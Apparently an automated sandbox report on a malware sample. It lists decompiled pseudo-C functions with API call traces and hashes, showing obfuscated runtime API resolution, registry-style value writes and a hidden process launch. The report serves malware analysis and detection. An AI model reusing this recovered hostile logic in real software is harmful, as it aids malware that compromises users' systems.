                                                            • Part of subcall function 02B91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                          • StrTrimA.SHLWAPI(00000000,02B9C28C,?,069B95B0), ref: 02B920E1
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9361A: lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                            • Part of subcall function 02B9361A: lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 02B92100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B92107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B92114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02B92118
                                                            • Part of subcall function 02B96777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 02B96829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02B92148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B92157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,069B95B0), ref: 02B92166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B92178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B92187
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: c64c0e2c283a8dfa3813759221b11c6a33b6c284dd20dabb713edeb1d1aa12ae
                                                          • Instruction ID: cf6c8424c7ae7c695ac0c5869ea077298665b08f7604a02d255ca13460200fe7
                                                          • Opcode Fuzzy Hash: c64c0e2c283a8dfa3813759221b11c6a33b6c284dd20dabb713edeb1d1aa12ae
                                                          • Instruction Fuzzy Hash: 8B61F531D80202AFCB11EB65EE48F56BBE9EB48380F054925FA44D7260D735E825DF75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E02B96C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x2b9d33c; // 0x69b9798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E02B9A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x2b9c18c;
                                                          				}
                                                          				_t46 = E02B918A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E02B9A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t16 = _t75 + 0x2b9eb08; // 0x530025
                                                          						 *0x2b9d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E02B9A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x2b9c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E02B9A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E02B9A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          							_t31 = _t66 + 0x2b9ec28; // 0x73006d
                                                          							 *0x2b9d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E02B9A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B96C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 02B96C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 02B96C96
                                                          • lstrlen.KERNEL32(00000000), ref: 02B96C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 02B96CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 02B96D0A
                                                          • lstrlen.KERNEL32(?), ref: 02B96D13
                                                          • lstrlen.KERNEL32(?), ref: 02B96D1A
                                                          • lstrlenW.KERNEL32(?), ref: 02B96D21
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: dbe2539418c366c0563884d0506908150b3c9af9ddb06ac994683d7260f55e41
                                                          • Instruction ID: 0e5d0a6d7f212bdbdb473acfc989710c48e76a331d09e984eb33ae9300cb4823
                                                          • Opcode Fuzzy Hash: dbe2539418c366c0563884d0506908150b3c9af9ddb06ac994683d7260f55e41
                                                          • Instruction Fuzzy Hash: 02415B76D00219FBCF11AFA9CD4899EBBB5EF48358F0544A1E904A7221DB35DA60EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E02B98EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E02B9592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E02B9A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x2b9d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t18 = _t47 + 0x2b9e3e6; // 0x73797325
                                                          					_t68 = E02B93C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t19 = _t50 + 0x2b9e747; // 0x69b8cef
                                                          						_t20 = _t50 + 0x2b9e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E02B9A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E02B9A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x2b9d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E02B9A734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 02B9592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B98EBD,?,00000001,?,?,00000000,00000000), ref: 02B95952
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B95974
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B9598A
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B959A0
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B959B6
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B959CC
                                                          • memset.NTDLL ref: 02B98F0B
                                                            • Part of subcall function 02B93C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02B98F24,73797325), ref: 02B93C59
                                                            • Part of subcall function 02B93C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02B93C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,069B8CEF,73797325), ref: 02B98F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02B98F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B98FB0
                                                            • Part of subcall function 02B9A62D: GetProcAddress.KERNEL32(36776F57,02B9A2D4), ref: 02B9A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 02B98F8D
                                                          • CloseHandle.KERNEL32(?), ref: 02B98F92
                                                          • GetLastError.KERNEL32(00000001), ref: 02B98F96
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: d83d25fa7924c7157317344c20793aee486d9c59c21b13f29f97d8005f8e6775
                                                          • Instruction ID: 131712860ac178efd78e21d52d86e15a2f3ce9d00832931cabef8e1d73345429
                                                          • Opcode Fuzzy Hash: d83d25fa7924c7157317344c20793aee486d9c59c21b13f29f97d8005f8e6775
                                                          • Instruction Fuzzy Hash: 23313EB2C00209BFDF11AFA4DD88E9EBBBDEB09344F0148A6E605A7110D7359A54CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E02B91BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t1 = _t9 + 0x2b9e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E02B9173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E02B9A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E02B964EF(_t34, _t41, _a8);
                                                          						E02B9A734(_t41);
                                                          						_t42 = E02B96467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E02B9A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E02B917E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E02B9A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E02B9A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}















                                                          APIs
                                                            • Part of subcall function 02B9173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,02B91BD0,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?), ref: 02B917A4
                                                            • Part of subcall function 02B9173D: sprintf.NTDLL ref: 02B917C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                          • lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • strcpy.NTDLL ref: 02B91C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
                                                            • Part of subcall function 02B964EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02B91C1A,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B96506
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                            • Part of subcall function 02B96467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02B91C34,00000000,?,?,02B920C2,?,069B95B0), ref: 02B96471
                                                            • Part of subcall function 02B96467: _snprintf.NTDLL ref: 02B964CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 783a0a94fded26eb17fbfbcb7b78fec68dfa789a692855d03639a6bce193d54a
                                                          • Instruction ID: 4b647e3cb37f3bb9dba239d85c1aa3e38b75e3f2a81c894d092dea0e485dd959
                                                          • Opcode Fuzzy Hash: 783a0a94fded26eb17fbfbcb7b78fec68dfa789a692855d03639a6bce193d54a
                                                          • Instruction Fuzzy Hash: 9511C677A01226774F12BBB89C45C6E3BBE9F4975430641B6F5049B200DF39CD02ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 02B968EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 02B968FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 02B96911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96993
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 7d762e1e84a33e940e22534107d49a00409b07bb525f06ed12939e18ab08c42e
                                                          • Instruction ID: 5ff12cf64f4245e80fd0e0cff33e14f55a21e6b888026ad872431b73cd45685a
                                                          • Opcode Fuzzy Hash: 7d762e1e84a33e940e22534107d49a00409b07bb525f06ed12939e18ab08c42e
                                                          • Instruction Fuzzy Hash: 94415E36D00609AFDF01DFB8D944A9EBBBAEF49304F144466EA14EB260DB71D905CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B9592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E02B9A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t1 = _t23 + 0x2b9e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					_t2 = _t26 + 0x2b9e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E02B9A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t5 = _t30 + 0x2b9e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          							_t7 = _t33 + 0x2b9e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          								_t9 = _t36 + 0x2b9e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          									_t11 = _t39 + 0x2b9e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E02B96604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B98EBD,?,00000001,?,?,00000000,00000000), ref: 02B95952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B95974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B9598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B959A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B959B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B959CC
                                                            • Part of subcall function 02B96604: memset.NTDLL ref: 02B96683
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 6622b8ef0acb40eff28390fdf6bfdc659e5f2b9ddf6c22f1d34843fb3558be49
                                                          • Instruction ID: f44b499ae11c3a7656262461294ca6e1be45e7a598c2d56c001f54752b9dc6e0
                                                          • Opcode Fuzzy Hash: 6622b8ef0acb40eff28390fdf6bfdc659e5f2b9ddf6c22f1d34843fb3558be49
                                                          • Instruction Fuzzy Hash: D5219FB064020AAFDB21EFAACD84D5AB7ECEF053447424576EA45C7220E734EA058F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E02B9853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x2b9d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E02B99070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E02B96E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E02B9A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x2b9d278; // 0x69b9a98
                                                          					_t16 = _t64 + 0xc; // 0x69b9b66
                                                          					_t65 = E02B99070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d02b9c0
                                                          						if(E02B922F1(_t97,  *_t33, _t91, _a8,  *0x2b9d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x2b9ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x2b9e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E02B96C38(_t69,  *0x2b9d334,  *0x2b9d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          									_t44 = _t71 + 0x2b9e846; // 0x74666f53
                                                          									_t73 = E02B99070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d02b9c0
                                                          										E02B95D7D( *_t47, _t91, _a8,  *0x2b9d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d02b9c0
                                                          										E02B95D7D( *_t49, _t91, _t99,  *0x2b9d330, _a16);
                                                          										E02B9A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d02b9c0
                                                          									E02B95D7D( *_t40, _t91, _a8,  *0x2b9d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d02b9c0
                                                          									E02B95D7D( *_t43, _t91, _a8,  *0x2b9d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E02B9A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d02b9c0
                                                          					_t81 = E02B98BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d02b9c0
                                                          							E02B922F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E02B9A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E02B9A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E02B9A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x2b9d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(02B93741,0000005F,00000000,00000000,00000104), ref: 02B98572
                                                          • lstrcpy.KERNEL32(?,?), ref: 02B9859F
                                                            • Part of subcall function 02B99070: lstrlen.KERNEL32(?,00000000,069B9A98,00000000,02B98808,069B9C76,?,?,?,?,?,63699BC3,00000005,02B9D00C), ref: 02B99077
                                                            • Part of subcall function 02B99070: mbstowcs.NTDLL ref: 02B990A0
                                                            • Part of subcall function 02B99070: memset.NTDLL ref: 02B990B2
                                                            • Part of subcall function 02B95D7D: lstrlenW.KERNEL32(?,?,?,02B98708,3D02B9C0,80000002,02B93741,02B9A513,74666F53,4D4C4B48,02B9A513,?,3D02B9C0,80000002,02B93741,?), ref: 02B95DA2
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02B985C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
